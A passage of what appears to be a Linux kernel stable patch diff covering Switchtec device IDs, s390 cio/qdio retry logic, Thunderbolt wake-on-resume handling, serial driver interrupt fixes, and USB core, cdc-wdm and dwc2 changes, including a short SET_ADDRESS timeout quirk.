++	SWITCHTEC_PCI_DEVICE(0x8576, SWITCHTEC_GEN3),  /* PFXI 96XG3 */
++	SWITCHTEC_PCI_DEVICE(0x4000, SWITCHTEC_GEN4),  /* PFX 100XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4084, SWITCHTEC_GEN4),  /* PFX 84XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4068, SWITCHTEC_GEN4),  /* PFX 68XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4052, SWITCHTEC_GEN4),  /* PFX 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4036, SWITCHTEC_GEN4),  /* PFX 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4028, SWITCHTEC_GEN4),  /* PFX 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4100, SWITCHTEC_GEN4),  /* PSX 100XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4184, SWITCHTEC_GEN4),  /* PSX 84XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4168, SWITCHTEC_GEN4),  /* PSX 68XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4152, SWITCHTEC_GEN4),  /* PSX 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4136, SWITCHTEC_GEN4),  /* PSX 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4128, SWITCHTEC_GEN4),  /* PSX 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4200, SWITCHTEC_GEN4),  /* PAX 100XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4284, SWITCHTEC_GEN4),  /* PAX 84XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4268, SWITCHTEC_GEN4),  /* PAX 68XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4252, SWITCHTEC_GEN4),  /* PAX 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4236, SWITCHTEC_GEN4),  /* PAX 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4228, SWITCHTEC_GEN4),  /* PAX 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4352, SWITCHTEC_GEN4),  /* PFXA 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4336, SWITCHTEC_GEN4),  /* PFXA 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4328, SWITCHTEC_GEN4),  /* PFXA 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4452, SWITCHTEC_GEN4),  /* PSXA 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4436, SWITCHTEC_GEN4),  /* PSXA 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4428, SWITCHTEC_GEN4),  /* PSXA 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4552, SWITCHTEC_GEN4),  /* PAXA 52XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4536, SWITCHTEC_GEN4),  /* PAXA 36XG4 */
++	SWITCHTEC_PCI_DEVICE(0x4528, SWITCHTEC_GEN4),  /* PAXA 28XG4 */
++	SWITCHTEC_PCI_DEVICE(0x5000, SWITCHTEC_GEN5),  /* PFX 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5084, SWITCHTEC_GEN5),  /* PFX 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5068, SWITCHTEC_GEN5),  /* PFX 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5052, SWITCHTEC_GEN5),  /* PFX 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5036, SWITCHTEC_GEN5),  /* PFX 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5028, SWITCHTEC_GEN5),  /* PFX 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5100, SWITCHTEC_GEN5),  /* PSX 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5184, SWITCHTEC_GEN5),  /* PSX 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5168, SWITCHTEC_GEN5),  /* PSX 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5152, SWITCHTEC_GEN5),  /* PSX 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5136, SWITCHTEC_GEN5),  /* PSX 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5128, SWITCHTEC_GEN5),  /* PSX 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5200, SWITCHTEC_GEN5),  /* PAX 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5284, SWITCHTEC_GEN5),  /* PAX 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5268, SWITCHTEC_GEN5),  /* PAX 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5252, SWITCHTEC_GEN5),  /* PAX 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5236, SWITCHTEC_GEN5),  /* PAX 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5228, SWITCHTEC_GEN5),  /* PAX 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5300, SWITCHTEC_GEN5),  /* PFXA 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5384, SWITCHTEC_GEN5),  /* PFXA 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5368, SWITCHTEC_GEN5),  /* PFXA 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5352, SWITCHTEC_GEN5),  /* PFXA 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5336, SWITCHTEC_GEN5),  /* PFXA 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5328, SWITCHTEC_GEN5),  /* PFXA 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5400, SWITCHTEC_GEN5),  /* PSXA 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5484, SWITCHTEC_GEN5),  /* PSXA 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5468, SWITCHTEC_GEN5),  /* PSXA 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5452, SWITCHTEC_GEN5),  /* PSXA 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5436, SWITCHTEC_GEN5),  /* PSXA 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5428, SWITCHTEC_GEN5),  /* PSXA 28XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5500, SWITCHTEC_GEN5),  /* PAXA 100XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5584, SWITCHTEC_GEN5),  /* PAXA 84XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5568, SWITCHTEC_GEN5),  /* PAXA 68XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5552, SWITCHTEC_GEN5),  /* PAXA 52XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5536, SWITCHTEC_GEN5),  /* PAXA 36XG5 */
++	SWITCHTEC_PCI_DEVICE(0x5528, SWITCHTEC_GEN5),  /* PAXA 28XG5 */
+ 	{0}
+ };
+ MODULE_DEVICE_TABLE(pci, switchtec_pci_tbl);
+diff --git a/drivers/s390/cio/device.c b/drivers/s390/cio/device.c
+index 02813b63f90fd..5666b9cc5d296 100644
+--- a/drivers/s390/cio/device.c
++++ b/drivers/s390/cio/device.c
+@@ -360,10 +360,8 @@ int ccw_device_set_online(struct ccw_device *cdev)
+ 
+ 	spin_lock_irq(cdev->ccwlock);
+ 	ret = ccw_device_online(cdev);
+-	spin_unlock_irq(cdev->ccwlock);
+-	if (ret == 0)
+-		wait_event(cdev->private->wait_q, dev_fsm_final_state(cdev));
+-	else {
++	if (ret) {
++		spin_unlock_irq(cdev->ccwlock);
+ 		CIO_MSG_EVENT(0, "ccw_device_online returned %d, "
+ 			      "device 0.%x.%04x\n",
+ 			      ret, cdev->private->dev_id.ssid,
+@@ -372,7 +370,12 @@ int ccw_device_set_online(struct ccw_device *cdev)
+ 		put_device(&cdev->dev);
+ 		return ret;
+ 	}
+-	spin_lock_irq(cdev->ccwlock);
++	/* Wait until a final state is reached */
++	while (!dev_fsm_final_state(cdev)) {
++		spin_unlock_irq(cdev->ccwlock);
++		wait_event(cdev->private->wait_q, dev_fsm_final_state(cdev));
++		spin_lock_irq(cdev->ccwlock);
++	}
+ 	/* Check if online processing was successful */
+ 	if ((cdev->private->state != DEV_STATE_ONLINE) &&
+ 	    (cdev->private->state != DEV_STATE_W4SENSE)) {
+diff --git a/drivers/s390/cio/qdio_main.c b/drivers/s390/cio/qdio_main.c
+index 9cde55730b65a..ebcb535809882 100644
+--- a/drivers/s390/cio/qdio_main.c
++++ b/drivers/s390/cio/qdio_main.c
+@@ -722,8 +722,8 @@ static void qdio_handle_activate_check(struct qdio_irq *irq_ptr,
+ 	lgr_info_log();
+ }
+ 
+-static void qdio_establish_handle_irq(struct qdio_irq *irq_ptr, int cstat,
+-				      int dstat)
++static int qdio_establish_handle_irq(struct qdio_irq *irq_ptr, int cstat,
++				     int dstat, int dcc)
+ {
+ 	DBF_DEV_EVENT(DBF_INFO, irq_ptr, "qest irq");
+ 
+@@ -731,15 +731,18 @@ static void qdio_establish_handle_irq(struct qdio_irq *irq_ptr, int cstat,
+ 		goto error;
+ 	if (dstat & ~(DEV_STAT_DEV_END | DEV_STAT_CHN_END))
+ 		goto error;
++	if (dcc == 1)
++		return -EAGAIN;
+ 	if (!(dstat & DEV_STAT_DEV_END))
+ 		goto error;
+ 	qdio_set_state(irq_ptr, QDIO_IRQ_STATE_ESTABLISHED);
+-	return;
++	return 0;
+ 
+ error:
+ 	DBF_ERROR("%4x EQ:error", irq_ptr->schid.sch_no);
+ 	DBF_ERROR("ds: %2x cs:%2x", dstat, cstat);
+ 	qdio_set_state(irq_ptr, QDIO_IRQ_STATE_ERR);
++	return -EIO;
+ }
+ 
+ /* qdio interrupt handler */
+@@ -748,7 +751,7 @@ void qdio_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ {
+ 	struct qdio_irq *irq_ptr = cdev->private->qdio_data;
+ 	struct subchannel_id schid;
+-	int cstat, dstat;
++	int cstat, dstat, rc, dcc;
+ 
+ 	if (!intparm || !irq_ptr) {
+ 		ccw_device_get_schid(cdev, &schid);
+@@ -768,10 +771,12 @@ void qdio_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 	qdio_irq_check_sense(irq_ptr, irb);
+ 	cstat = irb->scsw.cmd.cstat;
+ 	dstat = irb->scsw.cmd.dstat;
++	dcc   = scsw_cmd_is_valid_cc(&irb->scsw) ? irb->scsw.cmd.cc : 0;
++	rc    = 0;
+ 
+ 	switch (irq_ptr->state) {
+ 	case QDIO_IRQ_STATE_INACTIVE:
+-		qdio_establish_handle_irq(irq_ptr, cstat, dstat);
++		rc = qdio_establish_handle_irq(irq_ptr, cstat, dstat, dcc);
+ 		break;
+ 	case QDIO_IRQ_STATE_CLEANUP:
+ 		qdio_set_state(irq_ptr, QDIO_IRQ_STATE_INACTIVE);
+@@ -785,12 +790,25 @@ void qdio_int_handler(struct ccw_device *cdev, unsigned long intparm,
+ 		if (cstat || dstat)
+ 			qdio_handle_activate_check(irq_ptr, intparm, cstat,
+ 						   dstat);
++		else if (dcc == 1)
++			rc = -EAGAIN;
+ 		break;
+ 	case QDIO_IRQ_STATE_STOPPED:
+ 		break;
+ 	default:
+ 		WARN_ON_ONCE(1);
+ 	}
++
++	if (rc == -EAGAIN) {
++		DBF_DEV_EVENT(DBF_INFO, irq_ptr, "qint retry");
++		rc = ccw_device_start(cdev, irq_ptr->ccw, intparm, 0, 0);
++		if (!rc)
++			return;
++		DBF_ERROR("%4x RETRY ERR", irq_ptr->schid.sch_no);
++		DBF_ERROR("rc:%4x", rc);
++		qdio_set_state(irq_ptr, QDIO_IRQ_STATE_ERR);
++	}
++
+ 	wake_up(&cdev->private->wait_q);
+ }
+ 
+diff --git a/drivers/thunderbolt/quirks.c b/drivers/thunderbolt/quirks.c
+index 638cb5fb22c11..e81de9c30eac9 100644
+--- a/drivers/thunderbolt/quirks.c
++++ b/drivers/thunderbolt/quirks.c
+@@ -10,6 +10,7 @@
+ static void quirk_force_power_link(struct tb_switch *sw)
+ {
+ 	sw->quirks |= QUIRK_FORCE_POWER_LINK_CONTROLLER;
++	tb_sw_dbg(sw, "forcing power to link controller\n");
+ }
+ 
+ static void quirk_dp_credit_allocation(struct tb_switch *sw)
+@@ -130,6 +131,7 @@ void tb_check_quirks(struct tb_switch *sw)
+ 		if (q->device && q->device != sw->device)
+ 			continue;
+ 
++		tb_sw_dbg(sw, "running %ps\n", q->hook);
+ 		q->hook(sw);
+ 	}
+ }
+diff --git a/drivers/thunderbolt/switch.c b/drivers/thunderbolt/switch.c
+index 55698a0978f03..d3058ede53064 100644
+--- a/drivers/thunderbolt/switch.c
++++ b/drivers/thunderbolt/switch.c
+@@ -2880,22 +2880,29 @@ void tb_switch_unconfigure_link(struct tb_switch *sw)
+ {
+ 	struct tb_port *up, *down;
+ 
+-	if (sw->is_unplugged)
+-		return;
+ 	if (!tb_route(sw) || tb_switch_is_icm(sw))
+ 		return;
+ 
++	/*
++	 * Unconfigure the downstream port so that wake-on-connect can be
++	 * configured after router unplug. There is no need to unconfigure the
++	 * upstream port since its router is unplugged.
++	 */
+ 	up = tb_upstream_port(sw);
+-	if (tb_switch_is_usb4(up->sw))
+-		usb4_port_unconfigure(up);
+-	else
+-		tb_lc_unconfigure_port(up);
+-
+ 	down = up->remote;
+ 	if (tb_switch_is_usb4(down->sw))
+ 		usb4_port_unconfigure(down);
+ 	else
+ 		tb_lc_unconfigure_port(down);
++
++	if (sw->is_unplugged)
++		return;
++
++	up = tb_upstream_port(sw);
++	if (tb_switch_is_usb4(up->sw))
++		usb4_port_unconfigure(up);
++	else
++		tb_lc_unconfigure_port(up);
+ }
+ 
+ static void tb_switch_credits_init(struct tb_switch *sw)
+@@ -3135,7 +3142,26 @@ static int tb_switch_set_wake(struct tb_switch *sw, unsigned int flags)
+ 	return tb_lc_set_wake(sw, flags);
+ }
+ 
+-int tb_switch_resume(struct tb_switch *sw)
++static void tb_switch_check_wakes(struct tb_switch *sw)
++{
++	if (device_may_wakeup(&sw->dev)) {
++		if (tb_switch_is_usb4(sw))
++			usb4_switch_check_wakes(sw);
++	}
++}
++
++/**
++ * tb_switch_resume() - Resume a switch after sleep
++ * @sw: Switch to resume
++ * @runtime: Whether this is a resume from runtime suspend or system sleep
++ *
++ * Resumes and re-enumerates the router (and all its children) if it is still
++ * plugged in after suspend. A device router whose UID changed during suspend
++ * is not enumerated. On resume from system sleep, notifies the PM core about
++ * the wakes that occurred during suspend. Disables all wakes, except the
++ * USB4 wake of the upstream port on USB4 routers, which must stay enabled.
++ */
++int tb_switch_resume(struct tb_switch *sw, bool runtime)
+ {
+ 	struct tb_port *port;
+ 	int err;
+@@ -3184,6 +3210,9 @@ int tb_switch_resume(struct tb_switch *sw)
+ 	if (err)
+ 		return err;
+ 
++	if (!runtime)
++		tb_switch_check_wakes(sw);
++
+ 	/* Disable wakes */
+ 	tb_switch_set_wake(sw, 0);
+ 
+@@ -3213,7 +3242,8 @@ int tb_switch_resume(struct tb_switch *sw)
+ 			 */
+ 			if (tb_port_unlock(port))
+ 				tb_port_warn(port, "failed to unlock port\n");
+-			if (port->remote && tb_switch_resume(port->remote->sw)) {
++			if (port->remote &&
++			    tb_switch_resume(port->remote->sw, runtime)) {
+ 				tb_port_warn(port,
+ 					     "lost during suspend, disconnecting\n");
+ 				tb_sw_set_unplugged(port->remote->sw);
+diff --git a/drivers/thunderbolt/tb.c b/drivers/thunderbolt/tb.c
+index e83269dc2b067..c5e4fa478e643 100644
+--- a/drivers/thunderbolt/tb.c
++++ b/drivers/thunderbolt/tb.c
+@@ -1628,7 +1628,7 @@ static int tb_resume_noirq(struct tb *tb)
+ 	/* remove any pci devices the firmware might have setup */
+ 	tb_switch_reset(tb->root_switch);
+ 
+-	tb_switch_resume(tb->root_switch);
++	tb_switch_resume(tb->root_switch, false);
+ 	tb_free_invalid_tunnels(tb);
+ 	tb_free_unplugged_children(tb->root_switch);
+ 	tb_restore_children(tb->root_switch);
+@@ -1754,7 +1754,7 @@ static int tb_runtime_resume(struct tb *tb)
+ 	struct tb_tunnel *tunnel, *n;
+ 
+ 	mutex_lock(&tb->lock);
+-	tb_switch_resume(tb->root_switch);
++	tb_switch_resume(tb->root_switch, true);
+ 	tb_free_invalid_tunnels(tb);
+ 	tb_restore_children(tb->root_switch);
+ 	list_for_each_entry_safe(tunnel, n, &tcm->tunnel_list, list)
+diff --git a/drivers/thunderbolt/tb.h b/drivers/thunderbolt/tb.h
+index b3fec5f8e20cd..acf5b86208455 100644
+--- a/drivers/thunderbolt/tb.h
++++ b/drivers/thunderbolt/tb.h
+@@ -787,7 +787,7 @@ int tb_switch_configure(struct tb_switch *sw);
+ int tb_switch_add(struct tb_switch *sw);
+ void tb_switch_remove(struct tb_switch *sw);
+ void tb_switch_suspend(struct tb_switch *sw, bool runtime);
+-int tb_switch_resume(struct tb_switch *sw);
++int tb_switch_resume(struct tb_switch *sw, bool runtime);
+ int tb_switch_reset(struct tb_switch *sw);
+ int tb_switch_wait_for_bit(struct tb_switch *sw, u32 offset, u32 bit,
+ 			   u32 value, int timeout_msec);
+@@ -1182,6 +1182,7 @@ static inline struct tb_retimer *tb_to_retimer(struct device *dev)
+ 	return NULL;
+ }
+ 
++void usb4_switch_check_wakes(struct tb_switch *sw);
+ int usb4_switch_setup(struct tb_switch *sw);
+ int usb4_switch_read_uid(struct tb_switch *sw, u64 *uid);
+ int usb4_switch_drom_read(struct tb_switch *sw, unsigned int address, void *buf,
+diff --git a/drivers/thunderbolt/usb4.c b/drivers/thunderbolt/usb4.c
+index 3c821f5e44814..b0394ba6d111d 100644
+--- a/drivers/thunderbolt/usb4.c
++++ b/drivers/thunderbolt/usb4.c
+@@ -153,15 +153,18 @@ static inline int usb4_switch_op_data(struct tb_switch *sw, u16 opcode,
+ 				tx_dwords, rx_data, rx_dwords);
+ }
+ 
+-static void usb4_switch_check_wakes(struct tb_switch *sw)
++/**
++ * usb4_switch_check_wakes() - Check for wakes and notify PM core about them
++ * @sw: Router whose wakes to check
++ *
++ * Checks the wakes that occurred during suspend and notifies the PM core.
++ */
++void usb4_switch_check_wakes(struct tb_switch *sw)
+ {
+ 	struct tb_port *port;
+ 	bool wakeup = false;
+ 	u32 val;
+ 
+-	if (!device_may_wakeup(&sw->dev))
+-		return;
+-
+ 	if (tb_route(sw)) {
+ 		if (tb_sw_read(sw, &val, TB_CFG_SWITCH, ROUTER_CS_6, 1))
+ 			return;
+@@ -226,8 +229,6 @@ int usb4_switch_setup(struct tb_switch *sw)
+ 	u32 val = 0;
+ 	int ret;
+ 
+-	usb4_switch_check_wakes(sw);
+-
+ 	if (!tb_route(sw))
+ 		return 0;
+ 
+diff --git a/drivers/tty/serial/mxs-auart.c b/drivers/tty/serial/mxs-auart.c
+index d21a4f3ef2fe6..8b31017e7e563 100644
+--- a/drivers/tty/serial/mxs-auart.c
++++ b/drivers/tty/serial/mxs-auart.c
+@@ -1094,11 +1094,13 @@ static void mxs_auart_set_ldisc(struct uart_port *port,
+ 
+ static irqreturn_t mxs_auart_irq_handle(int irq, void *context)
+ {
+-	u32 istat;
++	u32 istat, stat;
+ 	struct mxs_auart_port *s = context;
+ 	u32 mctrl_temp = s->mctrl_prev;
+-	u32 stat = mxs_read(s, REG_STAT);
+ 
++	uart_port_lock(&s->port);
++
++	stat = mxs_read(s, REG_STAT);
+ 	istat = mxs_read(s, REG_INTR);
+ 
+ 	/* ack irq */
+@@ -1134,6 +1136,8 @@ static irqreturn_t mxs_auart_irq_handle(int irq, void *context)
+ 		istat &= ~AUART_INTR_TXIS;
+ 	}
+ 
++	uart_port_unlock(&s->port);
++
+ 	return IRQ_HANDLED;
+ }
+ 
+diff --git a/drivers/tty/serial/pmac_zilog.c b/drivers/tty/serial/pmac_zilog.c
+index fe2e4ec423f79..daf15d23bb42e 100644
+--- a/drivers/tty/serial/pmac_zilog.c
++++ b/drivers/tty/serial/pmac_zilog.c
+@@ -210,7 +210,6 @@ static bool pmz_receive_chars(struct uart_pmac_port *uap)
+ {
+ 	struct tty_port *port;
+ 	unsigned char ch, r1, drop, flag;
+-	int loops = 0;
+ 
+ 	/* Sanity check, make sure the old bug is no longer happening */
+ 	if (uap->port.state == NULL) {
+@@ -291,24 +290,11 @@ static bool pmz_receive_chars(struct uart_pmac_port *uap)
+ 		if (r1 & Rx_OVR)
+ 			tty_insert_flip_char(port, 0, TTY_OVERRUN);
+ 	next_char:
+-		/* We can get stuck in an infinite loop getting char 0 when the
+-		 * line is in a wrong HW state, we break that here.
+-		 * When that happens, I disable the receive side of the driver.
+-		 * Note that what I've been experiencing is a real irq loop where
+-		 * I'm getting flooded regardless of the actual port speed.
+-		 * Something strange is going on with the HW
+-		 */
+-		if ((++loops) > 1000)
+-			goto flood;
+ 		ch = read_zsreg(uap, R0);
+ 		if (!(ch & Rx_CH_AV))
+ 			break;
+ 	}
+ 
+-	return true;
+- flood:
+-	pmz_interrupt_control(uap, 0);
+-	pmz_error("pmz: rx irq flood !\n");
+ 	return true;
+ }
+ 
+diff --git a/drivers/tty/serial/stm32-usart.c b/drivers/tty/serial/stm32-usart.c
+index 2a9c4058824a8..7d11511c8c12a 100644
+--- a/drivers/tty/serial/stm32-usart.c
++++ b/drivers/tty/serial/stm32-usart.c
+@@ -755,6 +755,7 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 	const struct stm32_usart_offsets *ofs = &stm32_port->info->ofs;
+ 	u32 sr;
+ 	unsigned int size;
++	irqreturn_t ret = IRQ_NONE;
+ 
+ 	sr = readl_relaxed(port->membase + ofs->isr);
+ 
+@@ -763,11 +764,14 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 	    (sr & USART_SR_TC)) {
+ 		stm32_usart_tc_interrupt_disable(port);
+ 		stm32_usart_rs485_rts_disable(port);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+-	if ((sr & USART_SR_RTOF) && ofs->icr != UNDEF_REG)
++	if ((sr & USART_SR_RTOF) && ofs->icr != UNDEF_REG) {
+ 		writel_relaxed(USART_ICR_RTOCF,
+ 			       port->membase + ofs->icr);
++		ret = IRQ_HANDLED;
++	}
+ 
+ 	if ((sr & USART_SR_WUF) && ofs->icr != UNDEF_REG) {
+ 		/* Clear wake up flag and disable wake up interrupt */
+@@ -776,6 +780,7 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 		stm32_usart_clr_bits(port, ofs->cr3, USART_CR3_WUFIE);
+ 		if (irqd_is_wakeup_set(irq_get_irq_data(port->irq)))
+ 			pm_wakeup_event(tport->tty->dev, 0);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	/*
+@@ -790,6 +795,7 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 			uart_unlock_and_check_sysrq(port);
+ 			if (size)
+ 				tty_flip_buffer_push(tport);
++			ret = IRQ_HANDLED;
+ 		}
+ 	}
+ 
+@@ -797,6 +803,7 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 		spin_lock(&port->lock);
+ 		stm32_usart_transmit_chars(port);
+ 		spin_unlock(&port->lock);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+ 	/* Receiver timeout irq for DMA RX */
+@@ -806,9 +813,10 @@ static irqreturn_t stm32_usart_interrupt(int irq, void *ptr)
+ 		uart_unlock_and_check_sysrq(port);
+ 		if (size)
+ 			tty_flip_buffer_push(tport);
++		ret = IRQ_HANDLED;
+ 	}
+ 
+-	return IRQ_HANDLED;
++	return ret;
+ }
+ 
+ static void stm32_usart_set_mctrl(struct uart_port *port, unsigned int mctrl)
+@@ -1013,6 +1021,7 @@ static int stm32_usart_startup(struct uart_port *port)
+ 		val |= USART_CR2_SWAP;
+ 		writel_relaxed(val, port->membase + ofs->cr2);
+ 	}
++	stm32_port->throttled = false;
+ 
+ 	/* RX FIFO Flush */
+ 	if (ofs->rqr != UNDEF_REG)
+diff --git a/drivers/usb/class/cdc-wdm.c b/drivers/usb/class/cdc-wdm.c
+index fdc1a66b129a4..1f0951be15ab7 100644
+--- a/drivers/usb/class/cdc-wdm.c
++++ b/drivers/usb/class/cdc-wdm.c
+@@ -485,7 +485,6 @@ static ssize_t wdm_write
+ static int service_outstanding_interrupt(struct wdm_device *desc)
+ {
+ 	int rv = 0;
+-	int used;
+ 
+ 	/* submit read urb only if the device is waiting for it */
+ 	if (!desc->resp_count || !--desc->resp_count)
+@@ -500,10 +499,7 @@ static int service_outstanding_interrupt(struct wdm_device *desc)
+ 		goto out;
+ 	}
+ 
+-	used = test_and_set_bit(WDM_RESPONDING, &desc->flags);
+-	if (used)
+-		goto out;
+-
++	set_bit(WDM_RESPONDING, &desc->flags);
+ 	spin_unlock_irq(&desc->iuspin);
+ 	rv = usb_submit_urb(desc->response, GFP_KERNEL);
+ 	spin_lock_irq(&desc->iuspin);
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index b1fb04e5247c3..dea110241ee71 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -60,6 +60,12 @@
+ #define USB_PING_RESPONSE_TIME		400	/* ns */
+ #define USB_REDUCE_FRAME_INTR_BINTERVAL	9
+ 
++/*
++ * The SET_ADDRESS request timeout will be 500 ms when the
++ * USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT quirk flag is set.
++ */
++#define USB_SHORT_SET_ADDRESS_REQ_TIMEOUT	500  /* ms */
++
+ /* Protect struct usb_device->state and ->children members
+  * Note: Both are also protected by ->dev.sem, except that ->state can
+  * change to USB_STATE_NOTATTACHED even when the semaphore isn't held. */
+@@ -4648,7 +4654,12 @@ EXPORT_SYMBOL_GPL(usb_ep0_reinit);
+ static int hub_set_address(struct usb_device *udev, int devnum)
+ {
+ 	int retval;
++	unsigned int timeout_ms = USB_CTRL_SET_TIMEOUT;
+ 	struct usb_hcd *hcd = bus_to_hcd(udev->bus);
++	struct usb_hub *hub = usb_hub_to_struct_hub(udev->parent);
++
++	if (hub->hdev->quirks & USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT)
++		timeout_ms = USB_SHORT_SET_ADDRESS_REQ_TIMEOUT;
+ 
+ 	/*
+ 	 * The host controller will choose the device address,
+@@ -4661,11 +4672,11 @@ static int hub_set_address(struct usb_device *udev, int devnum)
+ 	if (udev->state != USB_STATE_DEFAULT)
+ 		return -EINVAL;
+ 	if (hcd->driver->address_device)
+-		retval = hcd->driver->address_device(hcd, udev);
++		retval = hcd->driver->address_device(hcd, udev, timeout_ms);
+ 	else
+ 		retval = usb_control_msg(udev, usb_sndaddr0pipe(),
+ 				USB_REQ_SET_ADDRESS, 0, devnum, 0,
+-				NULL, 0, USB_CTRL_SET_TIMEOUT);
++				NULL, 0, timeout_ms);
+ 	if (retval == 0) {
+ 		update_devnum(udev, devnum);
+ 		/* Device now using proper address. */
+diff --git a/drivers/usb/core/port.c b/drivers/usb/core/port.c
+index e91fa567d08d2..93a63b7f164d1 100644
+--- a/drivers/usb/core/port.c
++++ b/drivers/usb/core/port.c
+@@ -409,8 +409,10 @@ static void usb_port_shutdown(struct device *dev)
+ {
+ 	struct usb_port *port_dev = to_usb_port(dev);
+ 
+-	if (port_dev->child)
++	if (port_dev->child) {
+ 		usb_disable_usb2_hardware_lpm(port_dev->child);
++		usb_unlocked_disable_lpm(port_dev->child);
++	}
+ }
+ 
+ static const struct dev_pm_ops usb_port_pm_ops = {
+diff --git a/drivers/usb/core/quirks.c b/drivers/usb/core/quirks.c
+index 15e9bd180a1d2..b4783574b8e66 100644
+--- a/drivers/usb/core/quirks.c
++++ b/drivers/usb/core/quirks.c
+@@ -138,6 +138,9 @@ static int quirks_param_set(const char *value, const struct kernel_param *kp)
+ 			case 'o':
+ 				flags |= USB_QUIRK_HUB_SLOW_RESET;
+ 				break;
++			case 'p':
++				flags |= USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT;
++				break;
+ 			/* Ignore unrecognized flag characters */
+ 			}
+ 		}
+@@ -527,6 +530,10 @@ static const struct usb_device_id usb_quirk_list[] = {
+ 
+ 	{ USB_DEVICE(0x2386, 0x350e), .driver_info = USB_QUIRK_NO_LPM },
+ 
++	/* APTIV AUTOMOTIVE HUB */
++	{ USB_DEVICE(0x2c48, 0x0132), .driver_info =
++			USB_QUIRK_SHORT_SET_ADDRESS_REQ_TIMEOUT },
++
+ 	/* DJI CineSSD */
+ 	{ USB_DEVICE(0x2ca3, 0x0031), .driver_info = USB_QUIRK_NO_LPM },
+ 
+diff --git a/drivers/usb/dwc2/hcd_ddma.c b/drivers/usb/dwc2/hcd_ddma.c
+index 79582b102c7ed..994a78ad084b1 100644
+--- a/drivers/usb/dwc2/hcd_ddma.c
++++ b/drivers/usb/dwc2/hcd_ddma.c
+@@ -867,13 +867,15 @@ static int dwc2_cmpl_host_isoc_dma_desc(struct dwc2_hsotg *hsotg,
+ 	struct dwc2_dma_desc *dma_desc;
+ 	struct dwc2_hcd_iso_packet_desc *frame_desc;
+ 	u16 frame_desc_idx;
+-	struct urb *usb_urb = qtd->urb->priv;
++	struct urb *usb_urb;
+ 	u16 remain = 0;
+ 	int rc = 0;
+ 
+ 	if (!qtd->urb)
+ 		return -EINVAL;
+ 
++	usb_urb = qtd->urb->priv;
++
+ 	dma_sync_single_for_cpu(hsotg->dev, qh->desc_list_dma + (idx *
+ 				sizeof(struct dwc2_dma_desc)),
+ 				sizeof(struct dwc2_dma_desc),
+diff --git a/drivers/usb/gadget/function/f_ncm.c b/drivers/usb/gadget/function/f_ncm.c
+index 14601a2d25427..b267ed9dc6d99 100644
